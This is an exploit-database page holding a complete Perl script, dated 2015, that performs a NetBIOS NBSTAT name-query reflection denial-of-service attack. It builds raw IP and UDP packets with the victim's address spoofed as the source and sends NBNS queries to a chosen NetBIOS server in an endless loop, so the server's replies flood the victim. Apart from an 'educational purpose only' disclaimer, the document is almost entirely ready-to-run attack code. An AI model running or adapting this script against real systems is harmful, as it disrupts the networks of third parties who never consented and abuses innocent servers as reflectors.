NetBIOS NBSTAT Name Query Reflection Denial Of Service



EKU-ID: 4985 CVE: OSVDB-ID:
Author: Todor Donev Published: 2015-07-20 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


#!/usr/bin/perl
#
#  NetBios NBSTAT name query reflection dos
#
#  Copyright 2015 (c) Todor Donev 
#  todor.donev@gmail.com
#  http://www.ethical-hacker.org/
#  https://www.facebook.com/ethicalhackerorg
#
#  Disclaimer:
#  This or previous program is for Educational
#  purpose ONLY. Do not use it without permission.
#  The usual disclaimer applies, especially the
#  fact that Todor Donev is not liable for any
#  damages caused by direct or indirect use of the
#  information or functionality provided by these
#  programs. The author or any Internet provider
#  bears NO responsibility for content or misuse
#  of these programs or any derivatives thereof.
#  By using these programs you accept the fact
#  that any damage (dataloss, system crash,
#  system compromise, etc.) caused by the use
#  of these programs is not Todor Donev's
#  responsibility.
#
#  Use at your own risk and educational 
#  purpose ONLY!
#
#  See also, UDP-based Amplification Attacks:
#  https://www.us-cert.gov/ncas/alerts/TA14-017A
#  http://www.rhyshaden.com/netbios.htm
#

use strict;
use Socket;
use warnings;
no warnings 'uninitialized';

if ( $< != 0 ) {
   print "Sorry, must be run as root!\n";
   print "This script use RAW Socket.\n"; 
   exit;
}

my $nbns            = (gethostbyname($ARGV[0]))[4];         # IP Address Destination        (32 bits)
my $victim          = (gethostbyname($ARGV[1]))[4];         # IP Address Source             (32 bits)

print "[ NetBios NBSTAT name query reflection ddos\n";
if (!defined $nbns || !defined $victim) {
    print "[ Usg: $0 <nbns src> <victim>\n";
    print "[ <todor.donev\@gmail.com> Todor Donev\n";
    exit;
}
print "[ Sending NBNS packets: $ARGV[0] -> $ARGV[1]\n";
socket(RAW, PF_INET, SOCK_RAW, 255) or die $!;
setsockopt(RAW, 0, 1, 1) or die $!;
main();

    # Main program
sub main {
    my $packet;
    
    $packet = iphdr();
    $packet .= udphdr();
    $packet .= nbnshdr();
    # b000000m...
    send_packet($packet);
}

    # IP header (Layer 3)
sub iphdr {
    my $ip_ver         	= 4;					# IP Version 4			(4 bits)
    my $iphdr_len      	= 5;					# IP Header Length		(4 bits)
    my $ip_tos         	= 0;					# Differentiated Services	(8 bits)
    my $ip_total_len   	= $iphdr_len + 20;			# IP Header Length + Data	(16 bits)
    my $ip_frag_id     	= 0;					# Identification Field		(16 bits)
    my $ip_frag_flag   	= 000;					# IP Frag Flags (R DF MF)	(3 bits)
    my $ip_frag_offset 	= 0000000000000;			# IP Fragment Offset		(13 bits)
    my $ip_ttl         	= 255;					# IP TTL			(8 bits)
    my $ip_proto       	= 17;					# IP Protocol			(8 bits)
    my $ip_checksum    	= 0;					# IP Checksum			(16 bits)

    # IP Packet
	my $iphdr	= pack(
			'H2 H2 n n B16 h2 c n a4 a4',
			$ip_ver . $iphdr_len, $ip_tos, 
			$ip_total_len, $ip_frag_id, 
			$ip_frag_flag . $ip_frag_offset,
			$ip_ttl, $ip_proto, $ip_checksum,
			$victim, $nbns
			);
			return $iphdr;
}

    # UDP Header (Layer 4)
sub udphdr {
    my $udp_src_port	= 31337;			# UDP Sort Port		(16 bits) (0-65535)
    my $udp_dst_port	= 137;				# UDP Dest Port		(16 btis) (0-65535)
    my $udp_len		= 8 + length(nbnshdr());	# UDP Length		(16 bits) (0-65535)
    my $udp_checksum 	= 0;				# UDP Checksum		(16 bits) (XOR of header)

    # UDP Packet
    my $udphdr		= pack(
			'n n n n',
			$udp_src_port, 
			$udp_dst_port,
			$udp_len, 
			$udp_checksum
			);
	return $udphdr;
}

    # NetBios Name Service
sub nbnshdr {

    my $transid		 = 0x03e8;
    my $namequery	 = 0x0010;
    my $questions	 = 0x0001;
    my $answerrr	 = 0x0000;    
    my $authrr		 = 0x0000;
    my $adrr		 = 0x0000;
    
    my $query		 = "\x20\x43\x4b\x41\x41\x41\x41\x41\x41\x41\x41";
       $query		.= "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41";
       $query		.= "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x00";
        
    my $type		= 0x0021;    
    my $class		= 0x0001;

    # NetBios packet
    my $nbnshdr		= pack(
                        'n n n n n n a* n n', 
			 $transid,
                         $namequery,
			 $questions, 
			 $answerrr,
                         $authrr,
                         $adrr,
                         $query,
                         $type,
                         $class
			);
return $nbnshdr;
}

sub send_packet {
    while(1){
    select(undef, undef, undef, 0.30);			# Sleep 300 milliseconds
    send(RAW, $_[0], 0, pack('Sna4x8', AF_INET, 60, $nbns)) or die $!;
   }
}